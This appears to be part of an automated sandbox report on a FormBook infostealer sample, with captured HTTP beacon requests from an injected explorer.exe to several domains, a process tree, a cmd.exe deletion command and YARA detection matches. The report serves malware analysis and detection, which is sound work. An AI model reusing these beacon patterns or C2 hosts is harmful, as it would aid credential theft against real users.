                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb7c9ca-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session ID: 3, Source IP: 192.168.2.3, Source Port: 49730, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:14:04.137047052 CET, kBytes transferred: 1144, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1
                                                                      Host: www.teelinkz.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:14:04.252129078 CET, kBytes transferred: 1150, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:14:04 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb7c4ff-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session ID: 4, Source IP: 192.168.2.3, Source Port: 49731, Destination IP: 23.227.38.64, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:14:09.341078043 CET, kBytes transferred: 1173, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1
                                                                      Host: www.not-taboo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:14:09.492538929 CET, kBytes transferred: 1175, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 403 Forbidden
                                                                      Date: Fri, 20 Nov 2020 19:14:09 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      X-Sorting-Hat-PodId: 166
                                                                      X-Sorting-Hat-ShopId: 47446032551
                                                                      X-Dc: gcp-us-central1
                                                                      X-Request-ID: 3810f865-43d3-46ae-836c-35de5bfd2af3
                                                                      X-Download-Options: noopen
                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 0688ad194300002bc2c6a9d000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f547e086c722bc2-FRA
                                                                      Data Ascii: af4<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-ite


                                                                      Session ID: 5, Source IP: 192.168.2.3, Source Port: 49742, Destination IP: 65.254.250.119, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:14:52.037756920 CET, kBytes transferred: 4669, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1
                                                                      Host: www.tnicholson.design
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:14:52.143873930 CET, kBytes transferred: 4670, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 404 Not Found
                                                                      Date: Fri, 20 Nov 2020 19:14:52 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:03:34 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> <!-- browser does not support iframe's --> </iframe> </body></html>


                                                                      Session ID: 6, Source IP: 192.168.2.3, Source Port: 49743, Destination IP: 192.64.147.164, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:14:57.519289970 CET, kBytes transferred: 4671, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1
                                                                      Host: www.sabaicraft.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:14:57.684051991 CET, kBytes transferred: 4672, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 404 Not Found
                                                                      Date: Fri, 20 Nov 2020 19:14:57 GMT
                                                                      Server: Apache/2.2.3 (CentOS)
                                                                      X-Powered-By: PHP/5.3.8
                                                                      Set-Cookie: session=321b2d73e8965a770dd31776b723b317; expires=Fri, 20-Nov-2020 19:44:57 GMT; path=/
                                                                      Vary: Accept-Encoding,User-Agent
                                                                      P3P: CP="CAO PSA OUR"
                                                                      Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 31 Dec 2001 7:32:00 GMT
                                                                      Content-Length: 844
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Ascii: <html xmlns="http://www.w3.org/TR/REC-html40"> <head><title>sabaicraft.com</title><meta name="keywords" value=""/><meta name="description" content=""> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript">$(document).ready(function () { $('#main').attr('src', "/cf.php"); $('#main').css('visibility', 'visible');});/* if (parent.frames.length > 0) top.location.replace(document.location); */ </script> </head> <frameset rows="100%,*" frameborder="no" border="0" framespacing="0" id="frameset"><frame id="main" src="/cf.php"></frame><frame id="sub1" src="bh.php?dm=sabaicraft.com&kw=&tt=321b2d73e8965a770dd31776b723b317&ty=false" style="visibility: hidden;"></frame> </frameset></html>


                                                                      Session ID: 7, Source IP: 192.168.2.3, Source Port: 49744, Destination IP: 35.186.238.101, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:15:02.776315928 CET, kBytes transferred: 4673, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1
                                                                      Host: www.deadroommn.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:15:02.891478062 CET, kBytes transferred: 4674, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:15:02 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb6dfee-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session ID: 8, Source IP: 192.168.2.3, Source Port: 49745, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:15:13.044230938 CET, kBytes transferred: 4675, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1
                                                                      Host: www.keitakora.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:15:13.160152912 CET, kBytes transferred: 4675, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:15:13 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5fb7c4ff-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      System Behavior

                                                                      General

                                                                      Start time:20:13:00
                                                                      Start date:20/11/2020
                                                                      Path:C:\Users\user\Desktop\NQQWym075C.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\NQQWym075C.exe'
                                                                      Imagebase:0xed0000
                                                                      File size:552960 bytes
                                                                      MD5 hash:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:20:13:05
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Imagebase:0xd80000
                                                                      File size:64616 bytes
                                                                      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:20:13:07
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff714890000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:20:13:08
                                                                      Start date:20/11/2020
                                                                      Path:C:\Users\user\Desktop\NQQWym075C.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\NQQWym075C.exe'
                                                                      Imagebase:0xaf0000
                                                                      File size:552960 bytes
                                                                      MD5 hash:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:20:13:16
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Imagebase:0xd40000
                                                                      File size:64616 bytes
                                                                      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:20:13:19
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                      Imagebase:0xb80000
                                                                      File size:78848 bytes
                                                                      MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:20:13:23
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:20:13:24
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:20:13:24
                                                                      Start date:20/11/2020
                                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                      Imagebase:0x100000
                                                                      File size:143360 bytes
                                                                      MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Disassembly

                                                                      Code Analysis
